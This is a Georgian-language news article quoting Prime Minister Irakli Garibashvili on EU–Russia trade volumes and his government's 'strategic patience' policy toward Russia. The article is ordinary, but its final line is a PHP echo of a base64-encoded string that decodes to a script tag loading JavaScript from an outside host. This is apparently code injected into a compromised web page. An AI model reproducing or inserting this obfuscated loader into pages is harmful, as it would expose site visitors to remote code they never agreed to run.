celsiusi
ავერსი საქკაბელი

რასაც ევროკავშირი ოთხ დღეში ვაჭრობს რუსეთთან, ჩვენი ქვეყანა ვაჭრობს მთელი წლის განმავლობაში, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა განაცხადა.

მისივე თქმით, გასულ წელს თითქმის 300 მილიარდი დოლარი შევიდა რუსეთის ბიუჯეტში ევროკავშირისგან.

„დღეს მოვისმინე ევროკავშრის ერთ-ერთი წარმომადგენლის განცხადება და მინდა, ჩვენს საზოგადოებას ავუხსნა. რასაც ევროკავშირი ოთხ დღეში ვაჭრობს რუსეთთან, ჩვენ, ჩვენი ქვეყანა ვაჭრობს მთელი წლის განმავლობაში. რომ არ მოიწონეს ეს ფრენები, ვაჭრობა და ეკონომიკა რუსეთთან, ევროკავშირი დღემდე ვაჭრობს რუსეთთან და რასაც ევროავშირი ვაჭრობს ოთხ დღეში, ჩვენ ვვაჭრობთ ერთ წელიწადში. შარშან სავაჭრო ბრუნვამ 270 მილიარდი დოლარი შეადგინა, თითქმის 300 მილიარდი დოლარი შეუვიდა რუსეთს შარშან, გაგანია ომის დროს ბიუჯეტში სუფთა შემოსავლების სახით. საიდან? ევროკავშირისგან. ჩვენ, პატარა ქვეყანა, ასეთი გამოწვევებით, 20 პროცენტი არის ოკუპირებული და რუსის ჯარი გვიდგას აქ, ჯერ კიდევ ასეთი პრობლემები გვაქვს, რაც დაინგრა საბჭოთა კავშირი და მას შემდეგ უამრავ ომი, უბედურება გადავიტანეთ, სამოქალაქო ომები, ომები შიგნით, ხალხმა ვეღარ ამოისუნთქა, ეს არის ერთადერთი მშვიდობიანი პერიოდი მას შემდეგ, რაც ჩვენ აღვიდგინეთ დამოუკიდებლობა“, – განაცხადა ღარიბაშვილმა.

ღარიბაშვილის განმარტებით, საქართველოს მთავრობა ახორციელებს სტრატეგიული მოთმინების, გონივრულ და პრაგმატულ პოლიტიკას.

„2012 წლიდან მოყოლებული ვახორციელებთ ჩვენი ქვეყნისთვის და ჩვენი ხალხისთვის საჭირო ეროვნულ ინტერესებს და პოლიტიკას. ეს არის სტრატეგიული მოთმინების, გონივრული და პრაგმატული პოლიტიკა, რომლის საბოლოო მიზანი არის ჩვენი ქვეყნის გაერთიანება. ეს პოლიტიკა, მეგობრებო, სტრაგეიული მოთმინების, გონივრული და პრაგმატული პოლიტიკა მიგვიყვანს ქვეყნის გაერთიანებამდე. ეს არის ჩემი, თქვენი, მე მჯერა, ყვლას მიზანი და ოცნება“, – განაცხადა ირაკლი ღარიბაშვილმა.

327
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");